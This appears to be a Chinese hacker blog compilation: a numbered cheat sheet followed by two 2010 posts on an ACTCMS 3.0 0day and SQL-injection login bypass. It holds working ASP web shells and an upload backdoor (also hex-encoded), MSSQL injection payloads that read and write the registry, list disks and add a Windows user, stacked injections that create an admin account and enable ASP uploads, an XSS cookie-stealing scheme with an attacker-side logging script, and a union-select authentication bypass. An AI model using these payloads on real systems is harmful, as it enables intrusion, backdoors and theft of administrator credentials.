<% Dim szCMD, szTempFile%> 
<% Set oScript = Server.CreateObject("WSCRIPT.SHELL")%> 
<% Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")%> 
<% Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")%> 
<% szCMD = Request.Form(".CMD")%> 
<% If (szCMD <> "") Then%> 
<% szTempFile = "C:\" oFileSys.GetTempName()%> 
<% Call oScript.Run ("cmd.exe /c " szCMD & " > " & szTempFile, 0, True)%> 
<% Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)%> 
<% End If %> 
" method="POST"> 
"> 
<% If (IsObject(oFile)) Then%> 
<% On Error Resume Next%> 
<% Response.Write Server.HTMLEncode(oFile.ReadAll)%> 
<% oFile.Close%> 
<% Call oFileSys.DeleteFile(szTempFile, True)%> 
<% End If%> 

93、cmd.asp的一些变形
(1)



<br/><%response.write server.createobject("wscript.shell").exec("cmd.exe /c "request.form("cmd")).stdout.readall%><br/>
(2)
<br/><%response.write server.createobject("wscript.shell").exec("cmd.exe /c "request("cmd")).stdout.readall%><br/>(3)<br/><%response.write server.createobject("wscript.shell").exec("cmd.exe /c "request("cmd")).stdout.readall%><br/>(4)<br/><%=server.createobject("wscript.shell").exec("cmd.exe /c "request("c")).stdout.readall%><br/>(5)wscript.shell被改名怎么办？<br/><br/><%=kk.exec("cmd /c "+request("cmd")).stdout.readall%><br/>94、一个上传asp程序<br/><% dim objFSO %><br/><% dim fdata %><br/><% dim objCountFile %><br/><% on error resume next %><br/><% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %><br/><% if Trim(request("syfdpath"))<>"" then %><br/><% fdata = request("cyfddata") %><br/><% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %><br/><% objCountFile.Write fdata %><br/><% if err =0 then %><br/><% response.write "<font color=red>save Success!</font>" %><br/><% else %><br/><% response.write "<font color=red>Save UnSuccess!</font>" %><br/><% end if %><br/><% err.clear %><br/><% end if %><br/><% objCountFile.Close %><br/><% Set objCountFile=Nothing %><br/><% Set objFSO = Nothing %><br/><% Response.write "<form action='' method=post>" %><br/><% Response.write "保存文件的<font color=red>绝对路径(包括文件名:如D:\web\x.asp):</font>" %><br/><% Response.Write "<input type=text name=syfdpath width=32 size=50>" %><br/><% Response.Write "<br>" %><br/><% Response.write "本文件绝对路径" %><br/><% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %><br/><% Response.write "<br>" %><br/><% Response.write "输入马的内容:" %><br/><% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32>" %>
<% Response.write "" %>
<% Response.write "" %>
十六进制为:
0x3C252064696D206F626A46534F20253E
0x3C252064696D20666461746120253E
0x3C252064696D206F626A436F756E7446696C6520253E
0x3C25206F6E206572726F7220726573756D65206E65787420253E
0x3C2520536574206F626A46534F203D205365727665722E4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A656374222920253E
0x3C25206966205472696D2872657175657374282273796664706174682229293C3E2222207468656E20253E
0x3C25206664617461203D207265717565737428226379666464617461222920253E
0x3C2520536574206F626A436F756E7446696C653D6F626A46534F2E4372656174655465787446696C6528726571756573742822737966647061746822292C547275652920253E
0x3C25206F626A436F756E7446696C652E577269746520666461746120253E
0x3C2520696620657272203D30207468656E20253E 743E2220253E
0x3C2520656C736520253E
0x3C2520726573706F6E73652E777269746520223C666F6E7420636F6C6F723D7265643E5361766520556E53756363657373213C2F666F6E743E2220253E
0x3C2520656E6420696620253E
0x3C25206572722E636C65617220253E
0x3C2520656E6420696620253E
0x3C25206F626A436F756E7446696C652E436C6F736520253E
0x3C2520536574206F626A436F756E7446696C653D4E6F7468696E6720253E
0x3C2520536574206F626A46534F203D204E6F7468696E6720253E
0x3C2520526573706F6E73652E777269746520223C666F726D20616374696F6E3D2727206D6574686F643D706F73743E2220253E
0x3C2520526573706F6E73652E777269746520224FDD5B5865874EF676843C666F6E7420636F6C6F723D7265643E7EDD5BF98DEF5F8428530562EC65874EF6540D3A5982443A5C7765625C782E617370293A3C2F666F6E743E2220253E
0x3C2520526573706F6E73652E577269746520223C696E70757420747970653D74657874206E616D653D73796664706174682077696474683D33322073697A653D35303E2220253E
0x3C2520526573706F6E73652E577269746520223C62723E2220253E
0x3C2520526573706F6E73652E77726974652022672C65874EF67EDD5BF98DEF5F842220253E
0x3C25203D7365727665722E6D61707061746828526571756573742E5365727665725661726961626C657328225343524950545F4E414D4522292920253E
0x3C2520526573706F6E73652E777269746520223C62723E2220253E
0x3C2520526573706F6E73652E777269746520228F9351659A6C768451855BB93A2220253E
0x3C2520526573706F6E73652E777269746520223C7465787461726561206E616D653D637966646461746120636F6C733D383020726F77733D31302077696474683D33323E3C2F74657874617265613E2220253E
0x3C2520526573706F6E73652E777269746520223C696E70757420747970653D7375626D69742076616C75653D4FDD5B583E2220253E
0x3C2520526573706F6E73652E777269746520223C2F666F726D3E2220253E 
95、mssql中的存储过程
(1)xp_regenumvalues 注册表根键, 子键 
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run'　　以多个记录集方式返回所有键值 
(2)xp_regread 根键,子键,键值名 
;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir'　返回制定键的值 
(3)xp_regwrite 根键,子键, 值名, 值类型, 值 
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello'　写入注册表 
(4)xp_regdeletevalue 根键,子键,值名 
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName'　 删除某个值 
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey'　 删除键,包括该键下所有值
96、磁盘目录读取代码
(1) ;drop table [jm_tmp];create table [jm_tmp](subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)-- 创建表
(2) ;delete [jm_tmp];Insert [jm_tmp] exec master..xp_dirtree 'C:\',1,1-- 将C盘的文件夹及文件插入到表中
(3) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 1 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第一个文件夹名称
(4) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top 2 [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第二个文件夹名称
(5) and 1=(select top 1 cast([subdirectory] as nvarchar(400))+char(124)+cast([file] as nvarchar(1))+char(124) From(Select Top X [subdirectory],[file] From [jm_tmp] orDER BY [file],[subdirectory]) T orDER BY [file] desc,[subdirectory] desc) '//暴出第X个文件夹或文件名称
(6);drop table [jm_tmp]--删除此表
97、暴指定记录的字段：
暴第一条记录字段
and (select top 1 列名 from 表名)>0
暴指字记录字段(第二条记录）
and (select 列名 from (select top 1 * from (select top 2 * from 表名 order by 1) T order by 1 desc)S)>0
and (select 列名 from (select top 1 * from (select top x * from 表名 order by 1) T order by 1 desc)S)>0 注：X为指定的第X条记录
98、sa Injection中利用Access执行命令
(1);exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','Software\Microsoft\Jet\4.0\Engine\SandBoxMode',REG_DWORD,0--
(2);select * from openRowset('Microsoft.Jet.OLEDB.4.0',';Database=c:\winnt\system32\ias\ias.mdb','select shell("net user kev 1986 /add")');--
注：还可以用工具soshell.exe

记对ACTCMS系统漏洞挖掘之旅

haifanlovely@163.com(enjoyhack) — Sun,17 Oct 2010 01:45:15 +0800

      前两天在群闲聊的时候听群友有说遇到了个ACTCMS的系统，大家并在对ACTCMS多扯了几句，当时闲着无事便在网上搜索了下ACTCMS的漏洞信息。搜索结果针对之前版本的到是爆有注入漏洞，但对最新的3.0版貌似没有，于是就顺便去官网down了一个3.0的版本下来，抱着学习的目的对系统开始了漏洞的挖掘。

      拿到程序本地搭建好后第一件事就是上后台寻找拿shell的办法，然后再看前台的注入。系统后台登陆验证的地方做的还不错，借鉴动易的方式加了个认证码，而且其认证码和认证码的开关都是直接写在配置文件当中的。这个估计是在之前版本爆了注入和后台cookie欺骗登陆漏洞和作者才加上的。

      不过在后台管理系统中存在一些的弱点，主要针对取得webshell的方法，简略看了下后台系统的功能，发现取得webshell不是什么难事儿，而且方法还不止一种，我就随便测试了最简单的一种方法，在系统配置当中加上asp的上传类型，然后直接上传webshell。对于上传类型的设置整个系统当中有两处，一是网站基本设置当中的上传文件类型，这个主要是后台添加文章时候上传用的，另外一个则是用户组权限设置中的文件上传类型，这个是用于前台用户发表文章时候上传图片用的。

      找到后台拿shell的办法后接下来就是看前台程序的注入了，因为针对ASP网站系统漏洞的挖掘首先还是要考虑注入。不过程序作者在变量顾虑还是非常严谨的，读了好长时间的代码我都没找出未过滤的变量，眼看前台动态的程序页都快让我给读完了，不过，就在快要接近尾声的时候让我在某处找到了一个没有过滤的变量，并且直接代入到SQL语句中，我们来看看代码！

sub DelFriend()
        Dim TG_ID:TG_ID =Request("ID")         IF TG_ID = "" Then
            response.Write "请先选定好友"
            response.End
        End IF
         TG_ID = Split(TG_ID,",")
         For I = LBound(TG_ID) To UBound(TG_ID)
                 Conn.execute("Delete from  Friend_ACT   where U="& UserHS.UserID &"   and  ID = "&TG_ID(i)&"")          Next
        set conn=nothing
        response.Redirect("?")
end sub

      这个函数是在/user/Friend.asp文件中，函数是用于删除好友的，系统有用户互动的功能，会员与会员之间可以互相添加为好友，也可以删除好友。

      从以上代码中可以看出，TG_ID变量值直接使用request获取，并且未做任何过滤就带入到SQL语句中了，这样漏洞变产生了。现在很多有经验的程序员大多数也往往会在删除记录的时候出现类似的问题。

      针对这个漏洞的利用有一定局限性，可能对注入漏洞原理比较清楚的朋友可能会发现，对于ACCESS的数据库来说这个漏洞根本就没什么利用的，因为在漏洞产生的SQL语句中，并不是向数据库查询记录，而是删，页面中也不会输出任何SQL语句得到的内容。并且不管SQL语句是否正确，最终执行后的页面都是重定向到Friend.asp?，也就是说返回的页面都是一样的，这样我们也就不能根据页面情况来判断SQL语句的执行结果。

      不过，若网站是使用MSSQL数据库的话，那这个漏洞就大有用处了，大家都知道在注入中MSSQL能构造的语句比ACCESS的腰强大得多，所以针对这个注入点来说应该是ACTCMS 3.0 SQL版的0day，下面我就以SQL版为例，具体说下利用方式。

      对于SQL版的来说，很多朋友第一个想到的应该就是直接向数据库中添加个管理员账号或者更改管理员密码，不过网站后台系统登录的时候需要个认证码的，而认证码是无法从注入点得到的。所以说就算是有了后台管理账号密码，登录后台的几率也需要看人品。

      向数据库中加管理账号密码也是可以的，不过这里需要注意下，加管理的SQL语句有点特别，因为在代码中对ID值的获取后有一段处理代码：TG_ID = Split(TG_ID,",")，他的作用就是将获取到的值以逗号分隔成多个值，然后使用循环一个一个的删除数据库中的相应记录。例如在用户想批量删除他好友的时候，传送过来的只就是1,2,3,4,5,6，然后程序就分别去删除ID为1、2、3、4、5、6的记录，而不是去删除ID等于1,2,3,4,5,6的记录，所这里我们要向数据库中插入记录需要使用一下语句：Friend.asp?A=Del&ID=1;insert into Admin_Act (Admin_Name) values ('enjoyhack');update Admin_Act set PassWord='225cdc811adfe8d4' where Admin_Name='enjoyhack';update Admin_Act set SuperTF=1 where Admin_Name='enjoyhack'，插入管理后在后台登陆会报错，不过验证是通过了的，直接访问admin/f.asp页面即可。

      上面说到的是利用注入点加管理账号的方法，但由于管理后台登陆的时候需要提供认证码，而且认证码是直接写在配置文件当中的，我们光利用注入点是无法得到，所以加管理员的方法并不是很实用，这里给大家提供一个更为合适的办法，就是利用注入点更新用户组权限配置数据，添加一个asp文件的上传类型，然后前台用户发布文章直接上传webshell。

      但在更新用户组权限配置的时候需要注意一点，用户组权限当中所有的项目在数据库当中是存放在Group_Act的GroupSetting字段当中，每个项目之间使用^@$@^符号隔开，所以这里我们也不能使用常规的更新方式，例如;update Group set GroupSettiong='xxxxx' where id=3这样的方式是不行的，这样一来不仅不能跟新上传类型，而且还使得整个用户组的权限全部混乱了，这里我们需要先将他原来的全部配置做个备份，然后我们再将配置更新成系统初始值加一个asp上传类型，见一下语句：

Friend.asp?A=Del&ID=1;insert into Log_Act (GetHttp) select GroupSetting from Group_Act where GroupID=3  '备份用户组名为注册用户的设置到后他管理登陆日志当中，这样后台管理登陆日志就多了一条记录。

Friend.asp?A=Del&ID=1;update Group_Act set GroupSetting='0^@$@^注册会员^@$@^0^@$@^0^@$@^100^@$@^1000^@$@^100^@$@^1^@$@^Article/^@$@^1024^@$@^jpg/gif/bmp/png/asp^@$@^1^@$@^1^@$@^Simple^@$@^10^@$@^0^@$@^' where GroupID=3  '更新用户组名为注册用户的设置为系统初始值，并在上传类型中加了个asp文件类型

      这样就可以在发表文章的地方直接上传webshell了，是不是很简单啊！呵呵，看起来确实比较简单的，但是挖掘和构造语句的过程是枯燥的……在拿到webshell后记得到到/Admin/CheckCode.asp文件中找认证码或关闭认证码后到后台日志查看中找到备份的用户组配置信息，然后使用一下语句还原，要不是就给别人留后门了。

Friend.asp?A=Del&ID=1;update Group_Act set GroupSetting='后台日志管理，找到某条特操作者项或动作项为空的记录，点查看得到的备份值' where GroupID=3

      在整个系统当中默认的文章分类是允许注册用户发表投稿文章的，投稿后需要管理员审核才能发布，但在允许投稿用户组的地方默认是0，若是遇到不能发布文章的话就需要更新下某个分类的值，让其允许注册用户发布投稿，默认的注册用户组id值是3，具体语句：;update Class_Act set tg=1 where ClassID='4496645087';update Class_Act set TGGroupID=3 where ClassID='4496645087'，4496645087是分类ID号，这个可以在前台查看，鼠标放到某个分类上，右键-属性就可以看到。其实通过这个注入点还可以做其他的事情，包括修改文件上传目录、用户权限等等，这些大家可以下套程序，更具数据库结构自由的发挥。

=================================华丽的分割线=================================

      对于SQL版的0day就说到这里，但对ACTCMS 3.0的漏洞挖掘还未结束，接下来是将ACCESS版和SQL版都存在的一个漏洞，这个漏洞也是我之前所有文章中都未提及的，并且对于这个漏洞我也是略有所闻，但未实践过，这个便是系统中多处出现的XSS跨站漏洞，对于XSS跨站漏洞其他的知识大家可以去网上搜索下，我这里只针对ACTCMS的跨站做讲解，首先还是从代码开始，先看会员发布文章处：

<%
    sub Saveadd()
    dim TGGroupID,NewsID,Save_SQL
         ClassID=ACTCMS.G("ClassID")

         Title=Trim(ACTCMS.S("Title"))

         Keywords=Trim(ACTCMS.S("Keywords"))
         CopyFrom=Trim(ACTCMS.S("CopyFrom"))
         author=Trim(ACTCMS.S("author"))
         Content=ACTCMS.G("Content")
         PicUrl=ACTCMS.S("PicUrl")
         isAccept=ACTCMS.S("isAccept")

        ………………………………中间省略若干内容

        Set Save_SQL = server.CreateObject("adodb.recordset")
        Save_SQL.Open "Select * from "&ACTCMS.ACT_C(ModeID,2)&" where 1=0",Conn,1,3

        Save_SQL.AddNew
        Save_SQL("ClassID") = ClassID
        Save_SQL("Title") = Title '简短标题
        Save_SQL("isAccept") = isAccept
        Save_SQL("TemplateUrl") = ACTCMS.ACT_L(ClassID,5)
        Save_SQL("Content") = Content'内容
        Save_SQL("CopyFrom") = CopyFrom'
        Save_SQL("Keywords") = Keywords'关键字
        Save_SQL("UpdateTime")=now

        ………………………………中间省略若干内容

        Save_SQL.update
%>

      从以上代码中可以看到，包括文章标题在内的其他很多项目的内容都未经过过滤就更新到数据库当中去了，这个便是典型的XSS跨站漏洞了。以上代码中的ACTCMS.G函数其实只想当与request功能，并未做任何特殊字符的过滤。这里标题未经过任何的过滤我们就可以在标题中插入恶意JavaScript了，这里最好是选择标题这里插入，因为对于XSS跨站的利用，我们最起码的是要偷取管理员的cookie，ACTCMS 3.0系统中管理登陆后，账号和密码是会放到cookie中的，所以我们首先考虑到的是偷取管理的cookie。要偷取cookie就需要让管理在登录后台系统的情况下，然后在管理员的IE上执行我们的JavaScript代码。这里选择在标题中插入JavaScript代码的目的就在于注册用户在发布了文章之后默认是没有审核的，需要管理在后台系统中审核才能发布，这样只要管理在后台查看未审核的文章，那么他就会中招了。

      这里我们随便用注册账号发布一篇文章，在标题中插入，然后用管理身份去后台查看未审核的文章，只要页面中列出了刚才发布的文章标题即可获得管理的cookie了，如下图：

      可以看到管理的账号密码都已经得到了，这个只是个测试，我们若需要真正的偷取改怎么办呢？这里我们首先在发布文章的时候在标题处插入一个调用远程js文件的代码：，然后我们在xss.js中就可以针对我们想要的结果写相应的JavaScript程序了。最简单的例子，在xss.js中我们将管理的cookie值再次发送到http://www.enjoyhack/xss/cookies.asp，然后由cookies.asp文件接收cookie信息，然后将它保存起来，我们先在xss.js中这样写：

      然后我们写我们的cookies.asp文件，让他接收传送过来的cookie和网站地址，并使用fso组件将内容写入到一个txt文件中，代码如下：

<%

url=request("url")
cookie=request("cookies")

    set fso=server.CreateObject("Scripting.FileSystemObject")
    set txtfso=fso.OpenTextFile(server.mappath("enjoyhack.txt"),8,True)
    txtfso.WriteLine("url:"&url)
    txtfso.WriteLine("cookie:"&cookie)
    txtfso.WriteLine("time:"&now())
    txtfso.WriteLine("-------------------------------------------------------------------")
    txtfso.close
    response.end

%>

      这样在和cookie.asp文件同目录下就会产生一个enjoyhack.txt的文件，里面记录的就是管理员的cookie了！

      但是由于ACTCMS后台登陆需要认证码才能登陆，我们偷取cookie也不能得到认证码，所以我后来自己又想了个办法，虽然是可以成功但是还是不是很完美，最终有一个地方未突破。这里我也将就说下这个思路。就是使用JavaScript程序，利用管理的身份，在后台中自动提交修改用户组权限的表单页，在提交前再在上传类型上加一个asp的上传类型。

      我在发表文章的时候，标题的后面写入了调用两个远程js的代码，，其中xs.js文件的目的是在页面中输入一个iframe框架，用来调用修改用户组的表单页面（/admin/User/Group_Admin.asp?Action=Edit&GroupID=3），代码如下：，在调用中我暂时让框架显示出来，以便测试，这样调用了过后在后台管理员查看投稿的文章的时候，就会包含用户组权限修改的表单页了，如下图：

      在输入iframe框架包含了表单页面后，接着就需要使用xss.js的代码，让他修改iframe里面的表单页面中的某项，然后再做一个提交的动作，代码如下：

      最先测试我是先将发布文章时候标题哪里插入的代码“”放到一个单独的文件当中去测试的。这样测试发现始终不成功，然后一点一点的分析发现表单页面中自定义了css样式文件路径代码就不行，去掉这个代码就可以，然后我又把xss.js的内容修改成如下：

      这样在单独的文件中测试发现就可以正常提交表单了，但是执行的时候要弹出一个对话框，内容是css文件的路径。然后我接着把跨站代码“”插入到文章的标题，去后台查看未审核的文章，发现只能执行iframe调用表单页，并不能执行提交表单的动作。

      后来无意直接访问后台列出文章页面http://localhost/admin/ACT_Mode/ACT.Manage.asp?Action=ListisAccept，发现又能正常提交表单了。后来继续测试，把alert(v[0].href);把这个弹出窗口的语句注释掉后，直接访问http://localhost/admin/ACT_Mode/ACT.Manage.asp?Action=ListisAccept依然能提交成功，但是我单独的那个页面却又不能提交了！但是现在在http://localhost/admin/ACT_Mode/ACT.Manage.asp?Action=ListisAccept这个页面中能提交表单已经很不错了，因为最终的目标就是要管理在查看这个页面的时候自动提交，测试的那个页面不成功到没什么关系。但是现在经过我的测试发现后台文章列表的那个页面必须要在单独的窗口中打开才能执行提交，若在管理在后台，常规的打开查看就只能iframe包含表单页，不执行提交表单的动作，这个我现在认为的是可能后台正常操作打开文章列表页的时候文章页同时在一个iframe框架之下，而页面中又引用了框架的原因才不行。

      在后台若是管理员查看文章列表的时候，点击文章标题查预览文章内容的话这样同样也是可以执行表单提交的，因为打开查看文章内容是在一个新窗口中打开的。到这里我一直没有找到解决的办法，这个问题也留给大家有懂JavaScript的朋友们了，要是谁能搞定了别忘记留言和我联系下。

       好了，对ACTCMS 3.0 系统的漏洞挖掘就到这里了，文章中注入的地方有一些小小的技巧，同时我也写第一篇有关XSS漏洞利用的文章，虽然最后的结果并不是很完美，但也是自己学习和研究的成果，留下来的问题希望各有能力的朋友们下来研究下，我觉得xss跨站漏洞利用管理员后台身份去做其他的事情是个很不错的利用思路。ACTCMS 3.0其他地方也有不少的XSS跨站漏洞，包括后台发布文章都是一样的存在，对XSS有兴趣的朋友可以自己down一套研究研究。

SQL另类注入之绕过后台登陆验证

haifanlovely@163.com(enjoyhack) — Tue,12 Oct 2010 20:22:34 +0800

      好长时间都没更新Blog了，这段时间在学习Linux的基础应用，玩腻了脚本注入后总觉得黑客方面老是停留在整天玩注入漏洞，或者其他的脚本漏洞技术也没法得到提高。所以静下心来给自己安排了个学习计划，先从Linux学起，完了再学习编程以及业余时间深入研究下脚本及数据库。

      最近在学习之余还是不忘和各位群友闲谈扯蛋，也从他们身上学到了不少经验和技巧，前不久就从自然哪里学到一个另类的SQL注入技巧。当时是自然给出的一个例子，直接用一个语句绕过后台登陆验证进入到了后台。当时看了觉得挺不错，所以下来就深入的研究了下其原理，对其也有一定的了解。

      好了，废话不多说，下面直接进入正题吧。一提到绕过后台登陆验证直接进入网站后台管理系统，想必大家都能想到经典的万能密码：'or'='or'吧，今天要给大家分享的一个技巧也和这个差不多，不过是这个方法比较另类。

      在讲该技巧之前我们还是先来简单回顾下经典的'or'='or'原理，更详细的原理大家可以网上搜索相关资料了解下。我们都知道后台登陆验证一般的方式都是将用户在登录口输入的账号密码拿去与数据库中的记录做验证，并且要求输入的账号密码要等于数据库中某条记录的账号密码，验证通过则程序就会给用户一个sssion，然后进入后台，否则就返回到登陆口。而对于'or'='or'漏洞，我们先来看以下代码：

<%
pwd = request.form("pwd")  获取用户输入的密码,再把值赋给pwd
name = request.form("name")  获取用户输入的用户名再把值赋给name
都没有进行任何过滤
Set rs = Server.CreateObject("ADODB.Connection")
sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'"  将用户名和密码放入查询语句中查询数据库，
Set rs = conn.Execute(sql) 执行SQL语句，执行后并得到rs对象结果，“真”或“假”
If Not rs.EOF = True Then  如果是真则执行以下代码
Session("Name") =  rs("UserName")  将UserName的属性赋给Name的Session自定义变量
Session("pwd") =  rs("PassWord")  将PassWord的属性赋给pwd的Session自定义变量
Response.Redirect("Manage.asp")了  利用Response对象的Redirect方法重定向Manage.asp
Else 否则执行以下代码
Response.Redirect "Loginsb.asp?msg=您输入了错误的帐号或口令，请再次输入！"
End If
%>

      以上就是一个典型的'or'='or'漏洞例子，针对以上例子我们只需要在用户名处提交'or'='or'，这样就使得SQL语句变成：select * from Manage_User where UserName='’or‘='or'' And PassWord='123456'。执行后得到rs对象的结果为真，这样就能顺利的进入后台了。

      为了避免出现这个漏洞，现在基本上的后台验证都不会使用这类方式，而是取得用户输入的账号和密码，在SQL中先将用户名与数据库中的记录做对比，若数据库中某条记录的用户名等于用户输入的用户名，则取出该条记录中的密码，然后再与用户输入的密码对比，正确就通过，不正确就返回。例如一下代码：

<%
pwd = request.form("pwd")  获取用户输入的密码,再把值赋给pwd
name = request.form("name")  获取用户输入的用户名再把值赋给name
都没有进行任何过滤
Set rs = Server.CreateObject("ADODB.Connection")
sql = "select * from Manage_User where UserName='" & name & "'"  将用户名和密码放入查询语句中查询数据库，
Set rs = conn.Execute(sql) 执行SQL语句，执行后并得到rs对象结果，“真”或“假”
If Not rs.EOF = True Then  如果是真则执行以下代码
password=rs("password") 取得密码数据
if password=md5(pwd) then
Session("Name") =  rs("UserName")  将UserName的属性赋给Name的Session自定义变量
Session("pwd") =  rs("PassWord")  将PassWord的属性赋给pwd的Session自定义变量
Response.Redirect("Manage.asp")了  利用Response对象的Redirect方法重定向Manage.asp
else
response.write "密码错误！！！！"
end if
Else 否则执行以下代码
Response.Redirect "Loginsb.asp?msg=您输入了错误的帐号或口令，请再次输入！"
End If
%>

      通过以上例子可知道，密码的验证不再是直接在SQL语句中做验证了，而是根据用户名，取出对应的密码，然后再与用户输入的做对比。这样一来就造成了我们不能使用'or'='or'绕过了。有的朋友在这里可能有疑问了，若我们提交'or'='or'那么SQL语句就变成：select * from Manage_User where UserName=''or'='or''，这样一来得到的结果也应该是真啊，为什么就不能绕过呢？

      其实就算SQL查询的地方得到的值是真，可别忘了后面还有密码的验证，若我们提交以上SQL，得到账号是真的，那么后面根据账号去数据库中取出来的密码与用户提交的密码是绝对通不过的。

      好了，对于'or'='or'漏洞的分析先就暂且说到这里，以上的均为我个人对该漏洞的理解，并不代表就是完全正确的，若有不当的地方还望大家多多指教，接下来就是我们的重头戏了。

      昨天在帮流年看站的时候就遇到了一个旁站，当时是想注入，后来流年拿下服务器后顺便就将程序打包下来我研究了下，经过两个多小时的分析和测试，终于可以成功绕过了那套系统的后台登陆验证，接下来就结合程序代码，将我的整个分析过程给大家详细讲解下。

      程序类型是国外的一个小型商城系统，在检测的时候我就顺便构造了个关键词用google搜索下发现还有不少的网站。加之又是国外的，所决定要深入研究下，不过国外程序员在写程序的时候习惯和国内还是有不少的差异，往往国外的目录文件和程序结构分枝都很深，这点还让我在分析源代码的时候被代码牵着鼻子到处转……

      在拿到程序原本是首先看前台的注入的，但在打开数据库找到管理密码后我就放弃了从前台寻找注入的打算，因为管理的密码根本没法破解，就算找到注入用处也不大。因此要寻找程序的致命弱点只有往网后台或者无需验证的上传页面方向去了，然后查看了下所有的上传都需要后台验证才能上传。到此，唯一的路就是想法突破后台了。

      首先我们来看看后台登陆口（login.asp）的代码：

<%
if request.form("Submit") = "   Login   " then
if trim(request("yanzheng"))=session("ValidCode") then
    if DoLogin(request.form("LoginId"),request.form("Password")) = 1 then
        response.redirect("index.asp")
    end if
    else

    response.Redirect("login.asp?p=login")
    end if
end if
%>

      通过以上代码可以看出，login.asp页面验证登陆是将用户输入的账号和密码交给DoLogin函数验证，在DoLogin函数中，验证通过将返回一个值为1（通过验证进入后台），反之不等于则重定向到登陆页面。我们现在来看看DoLogin函数的内容。

private function DoLogin(login, pass)
    set rsLogin = server.createobject("ADODB.recordset")
    rsLogin.cursortype = 3

    strSQL = "Select admin_id, admin_salt, admin_password FROM admin_users Where admin_login = '" & login & "'"
    rsLogin.open strSQL, adoCon
    response.Write strSQL
    if not rsLogin.eof then
        correctPass = rsLogin("admin_password")
        controlPass = hashEncode(pass & rsLogin("admin_salt"))
        if correctPass = controlPass then
            DoLogin = 1
            session("admin_user_id") = rsLogin("admin_id")
            session("session_id") = session.SessionID
            session("order_flag") = 1
        else
            DoLogin = 0
        end if
    else
        DoLogin = 0
    end if

    rsLogin.close
    set rsLogin = nothing
end function

      “private function DoLogin(login, pass)”中的login何pass分别就是在上面的login.asp中的request.form("LoginId")和request.form("Password")，从以上代码中可以看到用户输入的账号和密码没有经过任何的过滤就带入到SQL语句中查询了。查询后的验证方式就和上文中提及的验证方式大同小异了。

      现在知道用户输入的账号和密码没有经过过滤（这点很重要），接下来我们还需要清楚管理员表的结构，这里我给大家截图上来，管理员表名是admin_users，结构如下图：

      可以看到管理员表中有四个字段，分别是ID号、用户名、以及salt和密码，密码在第四列。有了这些信息后我们就要开始着手构造SQL语句绕过后台登陆了。

      通过对登陆验证代码的分析，我们可以将整个验证过程简单描述为：验证函数取得用户输入的账号和密码，然后从管理员表中查询某条用户名等于用户输入用户名的记录，如果查询后得知管理表中存在某条记录，则继续取出该条记录的密码，然后再将此密码与用户输入的密码进行对比（用户输入的密码要经过加密），若密码验证成功则通过后台验证。

      现在我们的突破策略就是：提交某个SQL语句，让程序从管理员表中查询某条用户名等于用户输入用户名的记录结果为真，这样程序就会继续验证密码，然后我们再让程序从上步查询中得到一个密码的密文，这样一来就会顺利的通过验证了。

      突破程序查询用户名得到一个真值比较容易能做到，但后面的让程序同时得到一个密码的密文我想还真不容易办到，而且还要在一步中完成。但是办法确实是有的，这里我就直接给大家贴出来，这个办法也是我从自然兄那里学来的，说实在的我真是非常佩服想出这个办法的牛人。

      在这里我们需要使用union联合查询语句来绕过用户名的验证，并让查询同时得到一个密码密文，假设现在的这个网站系统密码是使用md5加密，在用户名的地方填写： 'union select 1,2,3,'225cdc811adfe8d4' from admin_user where 'a'='a，然后密码我们输入：hack，这样就能顺利绕过了后台验证了。

      union联合查询大家都不陌生，这里我就不详细说union联合查询的原理的，其实我也理解不是很深，没法用简洁的语言来真确表达，只是大概知道其意义。至于为什么要使用这样一个语句，大家可以参考上面我用红色字体表示的描述，再结合下面的说明自己体会。会网页编程的朋友应该不难理解，新手朋友就需要多下点功夫了。

      在以上语句中要说的就两点，一是密文：225cdc811adfe8d4，这个正是密码hack的16为小写md5值，另外union select 后面跟的数据位数是4位，这个要取决于admin_users表的结构，见上文中admin_users表的截图，而密文225cdc811adfe8d4一定要放在第四位上，这个也取决于admin_users表的结构。并且还要加上单引号，因为225cdc811adfe8d4是字符，这个懂SQL语句的朋友应该清楚。

      当我们提交'union select 1,2,3,'225cdc811adfe8d4' from admin_user where 'a'='a后我们再来分析下验证程序，首先SQL语句会变成：Select admin_id, admin_salt, admin_password FROM admin_users Where admin_login = ''union select 1,2,3,'225cdc811adfe8d4' from admin_user where 'a'='a' 仔细分析这个SQL语句可以得知，最终的执行结果是真，这样就解决了绕过用户名验证阶段，进入密码验证阶段。并且以上的语句执行后同时在返回的记录集中还能得到一个密码密文为'225cdc811adfe8d4'的值，这样在密码验证阶段中，就会将这个值与使用md5加密hack字符的结果对比，结果是一样的，最终就顺利的通过全部的验证了。可能这个对大多数朋友来说还是比较难理解，其实我也并未完完全全的理解，也只是理解了个大概，要想完完全全理解的话重点就在union联合查询的原理上了，能完完全全搞清楚union联合查询的原理话，这个应该就能很容易理解了。

